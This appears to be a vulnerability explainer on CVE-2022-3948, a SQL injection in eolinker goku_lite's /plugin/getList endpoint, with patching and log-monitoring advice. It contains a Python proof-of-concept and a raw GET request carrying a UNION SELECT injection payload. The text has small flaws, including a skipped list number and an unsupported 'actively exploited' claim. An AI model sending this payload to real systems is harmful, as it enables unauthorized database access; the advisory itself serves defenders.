CVE-2022-3948 - Critical SQL Injection Vulnerability in eolinker goku_lite (VDB-213454) Explained

eolinker goku_lite, an API management platform, was found to contain a critical security hole that could allow attackers to compromise your data remotely. This article covers everything you need to know about CVE-2022-3948—from discovery, impact, and exploit details to how you can protect yourself.

What is CVE-2022-3948?

CVE-2022-3948 is the official identifier for a critical SQL injection vulnerability discovered in the goku_lite product by eolinker. The flaw is tracked as VDB-213454 and affects the /plugin/getList endpoint, specifically the route/keyword argument. Because attackers can remotely exploit this bug, all internet-accessible installations are at risk.

Why is this Vulnerability Dangerous?

SQL injection allows an attacker to send malicious SQL statements to the application’s database, letting them read, manipulate, or even delete critical data. In the worst case, attackers could gain administrative access or leak sensitive information.

Technical Details

Affected File:
/plugin/getList – The endpoint vulnerable to SQL injection.

Vulnerable Parameter:
route/keyword – User input is not properly sanitized.

Impact:
Data theft, modification, and potential full database compromise.

Proof of Concept Exploit

Below is a simplified Python exploit using requests to demonstrate the vulnerability. You should only test this on systems you own or with explicit permission!

import requests

# Target eolinker goku_lite installation URL
url = "http://target-site.com/plugin/getList";
# SQL injection payload to extract current database user
payload = "' UNION SELECT user(),2,3-- -"
params = {
    "route/keyword": payload
}

# Send the malicious request
response = requests.get(url, params=params)

# Output the results
print("Status Code:", response.status_code)
print("Response Body:\n", response.text)

If the response contains database information or errors, the target is indeed vulnerable.

How Does the Attack Work?

1. The attacker crafts a request where the route/keyword parameter is set to a malicious SQL statement.

The application inserts the parameter into an SQL query without validation or sanitation.

3. The database executes unintended commands, revealing sensitive data or compromising the whole system.

Original References

- VulDB VDB-213454 Advisory
- NVD CVE-2022-3948 Entry
- Exploit Details on ExploitDB (if published)

An attacker sends the following GET request

GET /plugin/getList?route/keyword=' UNION SELECT user(),2,3-- -
Host: target-site.com

If the attacker gets a response with the database user name or unexpected data, it proves the target is susceptible.

Update Your eolinker goku_lite Immediately

Check for available security updates from the official repository or your vendor.

Monitor Logs

Look for suspicious activity, such as odd requests to /plugin/getList.

Conclusion

CVE-2022-3948 (VDB-213454) is a critical and actively exploited SQL injection vulnerability in eolinker goku_lite. If you’re running this software, make updating and patching a priority to protect your data—and always restrict remote access if possible.

Further Reading

- General SQL Injection Explanation – OWASP:
- How to Fix SQL Injection – Github Gist Guide

Timeline

Published on: 11/11/2022 13:15:00 UTC
Last modified on: 11/15/2022 21:05:00 UTC